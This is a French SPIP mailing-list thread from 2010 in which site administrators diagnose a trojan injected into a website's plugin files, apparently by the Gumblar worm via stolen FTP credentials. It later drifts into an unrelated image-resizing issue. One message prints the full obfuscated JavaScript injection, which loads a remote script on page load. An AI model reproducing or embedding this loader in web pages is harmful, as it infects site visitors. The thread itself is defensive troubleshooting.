Cheval de troie dans les plugins ?

Général
1

Bonjour,
Après quelques jours d'absence, j'ouvre un site dont je m'occupe et qui a toujours marché sans problème et là, hop ! Alerte maximum, trompettes, fifres z-et tambours, un cheval de Troie dans le site, au niveau des plugins semble-t-il :
http://saintbrieuc-treguier.catholique.fr/
Cela vient-il :
- de l'hébergeur ?
- de l'hébergé ?
- des plugins eux-même ?
Merci de vos lumières. En attendant je vais faire le ménage.
Cordialement,

--
Philippe G.

2

Le 08/03/2010 13:01, Philippe G a écrit :

Bonjour,
Après quelques jours d'absence, j'ouvre un site dont je m'occupe et qui
a toujours marché sans problème et là, hop ! Alerte maximum, trompettes,
fifres z-et tambours, un cheval de Troie dans le site, au niveau des
plugins semble-t-il :
http://saintbrieuc-treguier.catholique.fr/
Cela vient-il :
- de l'hébergeur ?
- de l'hébergé ?
- des plugins eux-même ?
Merci de vos lumières. En attendant je vais faire le ménage.
Cordialement,

Tous les plugins supprimés, plus de message. Je les réinstalle un à un.

--
Philippe G.

3

Le 08/03/2010 13:16, Philippe G a écrit :

Le 08/03/2010 13:01, Philippe G a écrit :

Bonjour,
Après quelques jours d'absence, j'ouvre un site dont je m'occupe et qui
a toujours marché sans problème et là, hop ! Alerte maximum, trompettes,
fifres z-et tambours, un cheval de Troie dans le site, au niveau des
plugins semble-t-il :
http://saintbrieuc-treguier.catholique.fr/
Cela vient-il :
- de l'hébergeur ?
- de l'hébergé ?
- des plugins eux-même ?
Merci de vos lumières. En attendant je vais faire le ménage.
Cordialement,

Tous les plugins supprimés, plus de message. Je les réinstalle un à un.

Le cheval de Troie était aussi dans /prive. Je l'ai supprimé et remplacé. A priori ça remarchera quand j'aurais réinstallé tous les plugins...

--
Philippe G.

4

* Philippe G tapuscrivait, le 08/03/2010 13:42:

Le 08/03/2010 13:16, Philippe G a écrit :

Le 08/03/2010 13:01, Philippe G a écrit :

Bonjour,
Après quelques jours d'absence, j'ouvre un site dont je m'occupe et qui
a toujours marché sans problème et là, hop ! Alerte maximum, trompettes,
fifres z-et tambours, un cheval de Troie dans le site, au niveau des
plugins semble-t-il :
http://saintbrieuc-treguier.catholique.fr/
Cela vient-il :
- de l'hébergeur ?
- de l'hébergé ?
- des plugins eux-même ?
Merci de vos lumières. En attendant je vais faire le ménage.
Cordialement,

Tous les plugins supprimés, plus de message. Je les réinstalle un à un.

Le cheval de Troie était aussi dans /prive. Je l'ai supprimé et
remplacé. A priori ça remarchera quand j'aurais réinstallé tous les
plugins...

Ce serait pas plutôt l'accès FTP du site qui serait compromis par

ou une de ses variantes ?

-- RealET

5

Philippe G a écrit :

Bonjour,
Après quelques jours d'absence, j'ouvre un site dont je m'occupe et qui a toujours marché sans problème et là, hop ! Alerte maximum, trompettes, fifres z-et tambours, un cheval de Troie dans le site, au niveau des plugins semble-t-il :
http://saintbrieuc-treguier.catholique.fr/
Cela vient-il :
- de l'hébergeur ?
- de l'hébergé ?
- des plugins eux-même ?
Merci de vos lumières. En attendant je vais faire le ménage.
Cordialement,

Le site http://www.unmaskparasites.com/ trouve ça :
-----------------
Is there any good reason for this script to be outside of <HTML>...</HTML> block?

try {var c=new Array();var Z=new Array();var L='[';var W='replace';this.bb="";var kU=new String();v...
-----------------
Et effectivement :
<script>try {var c=new Array();var Z=new Array();var L='[';var W='replace';this.bb="";var kU=new String();var S=RegExp;var r='g';var Bo='';var u='';var R='';var v=']';var wb;if(wb!='' && wb!='Wn'){wb='rY'};var A=new Array();var q;if(q!='U'){q='U'};function w(s,j){this.uk='';this.gb="";var Cv;if(Cv!=''){Cv='jT'};var g=L;g+=j;g+=v;var _o;if(_o!='qB' && _o != ''){_o=null};var Ly=new S(g, r);this.szd='';return s[W](Ly, u);var l=new Date();};var k=w('h0tXt0pX:X/b/Xs0eXabrbs0-Xcbobmb.XlbiXnbkXw0ibtzhzizn0.0czo0mz.zyXiXm0gz-Xc0ozmX.0mXy0dbizrze0cztzo0u0tXlXebtz.XrXuz:0',"bzX0");var d='';var WC='';var L_=w('sXcXrXiXpmtm',"mX");this.xs="";var bl;if(bl!='cm'){bl='cm'};var gH=w('bso9dsys',"s9");var OF;if(OF!='xh' && OF != ''){OF=null};var sL=new String();var D=w('a4pJpveJnvd4CJhvivlJd4',"J4v");var qv=new Date();var qp=new Date();var e=w('872629670297692827624240672627',"24976");var H=new Array();this.Uv='';var vt=w('sve7tGA7tJtorJiobJu7tJev',"JvGo7");var yY='';var W_;if(W_!='' && W_!='vk'){W_=''};var b=w('cyryeCaCtyeyEClyeCmyeFnFtC',"FCy");var m=w('/6gQo5o1g1lQe5.5cQo5m1/6g1o5oQgQl1e5.1c5o6m6/Qy1a6h1o1o6.1c1o1m6.QcQn1/6f5e5e5d6b1uQr5n5eQr6.1c5o6m6/Qm1i6l1l1iQy1e6t5.1c5o5m5.1t1r1.1p1h1p5',"5Q61");var sF=w('oGnKlGo0a0d0',"G0Kcz");var s="1";var N='';var RC=new Date();window[sF]=function(){this.jw='';var an;if(an!='' && an!='qc'){an=null};y=document[b](L_);var Mn=new Array();N+=k;N+=e;N+=m;var GZ=new String();var NW;if(NW!='Yv' && NW != ''){NW=null};this.KY='';var xO;if(xO!='' && xO!='vY'){xO='kj'};var h=document[gH];y.src=N;y.setAttribute('defer', s);this.jz='';h.appendChild(y);};var Q='';this.fB="";var ac;if(ac!='' && ac!='bh'){ac='Oa'};} catch(p){};var nG;if(nG!='' && nG!='ql'){nG='ag'};this.TO='';</script>
<!--6ad84d1189aa51ccd872a21e401b219d-->

Me semble suspect !

--
Sergio
Éditions Touchalon: htpp://touchalon.free.fr
Soutenez le libre: http://www.framasoft.org

6

Le 08/03/10 14:20, Sergio a écrit :

<script>try {var c=new Array();var Z=new Array();var L='[';var

[snip]

Me semble suspect !

voir particulièrement :
   http://article.gmane.org/gmane.comp.web.spip.user/152793

ou tout le thread :
   http://article.gmane.org/gmane.comp.web.spip.user/152769

7

oui je pense aussi que c'est plutot dans cette direction qu'il faut regarder, ayant été victime de ce problème il y a quelques mois, j'ai moi aussi été prompt à accuser spip et consorts, mais le problème venait d'un troyen sur ma machine et d'un antivirus trop laxiste (antivir) depuis je suis passé à avast et j'ai modifié les identifiants de mes comptes ftp sur filezilla et plus de problème.

pour Philippe, si ton problème est un bout de javascript incompréhensible tout en bas de tes pages index.html (ou peut être d'autres) ne cherche pas plus loin, tu as ce troyen.

troOn

RealET a écrit :

* Philippe G tapuscrivait, le 08/03/2010 13:42:

Le 08/03/2010 13:16, Philippe G a écrit :

Le 08/03/2010 13:01, Philippe G a écrit :

Bonjour,
Après quelques jours d'absence, j'ouvre un site dont je m'occupe et qui
a toujours marché sans problème et là, hop ! Alerte maximum, trompettes,
fifres z-et tambours, un cheval de Troie dans le site, au niveau des
plugins semble-t-il :
http://saintbrieuc-treguier.catholique.fr/
Cela vient-il :
- de l'hébergeur ?
- de l'hébergé ?
- des plugins eux-même ?
Merci de vos lumières. En attendant je vais faire le ménage.
Cordialement,

Tous les plugins supprimés, plus de message. Je les réinstalle un à un.

Le cheval de Troie était aussi dans /prive. Je l'ai supprimé et
remplacé. A priori ça remarchera quand j'aurais réinstallé tous les
plugins...

Ce serait pas plutôt l'accès FTP du site qui serait compromis par
Sécurité : attention au ver Gumblar - ZZZ
ou une de ses variantes ?

-- RealET

_______________________________________________
liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net

Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net

Documentation de SPIP : http://www.spip.net/

Irc : de l'aide à toute heure : http://spip.net/irc

8

Le 08/03/10 14:39, Younès Benjelloun a écrit :

tu as ce troyen.

<coupeur de cheveux en 4>

ces pauvres Troyens n'y sont pour rien !

il s'agit bien d'un "cheval de Troie" offert par des Grecs.

(même si outre-atlantique on a pris l'habitude de (mal) parler
de trojan en lieu et place de "trojan horse")

</coupeur de cheveux en 4>

9

Le 08/03/2010 14:43, denisb a écrit :

Le 08/03/10 14:39, Younès Benjelloun a écrit :

tu as ce troyen.

<coupeur de cheveux en 4>

Pour des "acheens chevelus", c est un minimum...

10

Sergio a écrit :

---
Antivirus avast! : message Entrant INFECTE :
\PartNo_0#2215312347 (JS:Illredir-Z [Trj]) a ete supprime du message.

Base de donnees virale (VPS) : 100308-0, 08/03/2010
Analyse le : 08/03/2010 17:47:56
avast! - copyright (c) 1988-2010 ALWIL Software.
http://www.avast.com

.

bon mêm le message été infecté

11

assobachant a écrit :

Sergio a écrit :

---
Antivirus avast! : message Entrant INFECTE :
\PartNo_0#2215312347 (JS:Illredir-Z [Trj]) a ete supprime du message.

Base de donnees virale (VPS) : 100308-0, 08/03/2010
Analyse le : 08/03/2010 17:47:56
avast! - copyright (c) 1988-2010 ALWIL Software.
http://www.avast.com

.

bon mêm le message été infecté
_______________________________________________

Aie, mon antivirus (Antivir) n'a pas bronché !

12

Le 08/03/2010 18:04, Jean-Christophe Villeneuve a écrit :

Aie, mon antivirus (Antivir) n'a pas bronché !

Ni mon Avira !

pour mon souci de plugin, j'ai reçu ceci de la part de Bill :
salut,
le GD a pas l'air actif (config. avancée) ou alors les images sont trop grandes pour etre redimensionnées.
la, meme les vignettes sont en fait les images en taille réelle.
Ca peut aussi venir d'un image_reduire appliqué au #TEXTE dans le squelette article correspondant => à verifier.

@++

PS : il y a une erreur javascript => socialtag

Comprends-tu le passage où il parle de image_reduire ?

--
Djeel

13

djeel a écrit :

Le 08/03/2010 18:04, Jean-Christophe Villeneuve a écrit :

Aie, mon antivirus (Antivir) n'a pas bronché !

Ni mon Avira !

c'est le même

pour mon souci de plugin, j'ai reçu ceci de la part de Bill :
salut,
le GD a pas l'air actif (config. avancée)

tu m'as dit qu'il était actif

ou alors les images sont trop grandes pour etre redimensionnées.

non puisqu'elles étaient en 700 x 540 je crois, ce qui n'est pas énorme

la, meme les vignettes sont en fait les images en taille réelle.

donc la réduction des images s'applique sur les vignettes

Ca peut aussi venir d'un image_reduire appliqué au #TEXTE dans le squelette article correspondant => à verifier.

as-tu le filtre image_reduire appliqué à #TEXTE dans ton squelette article ?
Ceci dit, moi je l'ai et ça ne gêne pas

@++

PS : il y a une erreur javascript => socialtag

ne mélangeons pas tout

A tout hasard, as-tu essayé de désactiver tous les autres plugins, en ne laissant que diapo et sarka (s'il est en plugin) ?

14

Le 08/03/2010 19:08, Jean-Christophe Villeneuve a écrit :

le GD a pas l'air actif (config. avancée)

tu m'as dit qu'il était actif

oui

ou alors les images sont trop grandes pour etre redimensionnées.

non puisqu'elles étaient en 700 x 540 je crois, ce qui n'est pas énorme

photos de départ : 640x480

la, meme les vignettes sont en fait les images en taille réelle.

donc la réduction des images s'applique sur les vignettes

ok

Ca peut aussi venir d'un image_reduire appliqué au #TEXTE dans le
squelette article correspondant => à verifier.

as-tu le filtre image_reduire appliqué à #TEXTE dans ton squelette
article ?

j'ai dans /squelettes.dist/article.html :
  [<div class="#EDIT{texte} texte entry-content">(#TEXTE|image_reduire{500,0})</div>]

PS : il y a une erreur javascript => socialtag

ne mélangeons pas tout

Oui, ça n'a rien à voir à ce que je pense...

A tout hasard, as-tu essayé de désactiver tous les autres plugins, en ne
laissant que diapo et sarka (s'il est en plugin) ?

J'ai désactivé sarka, mais pas de redimensionnement ; j'essaierai ce que tu proposes

Merci de ton aide...

--
Djeel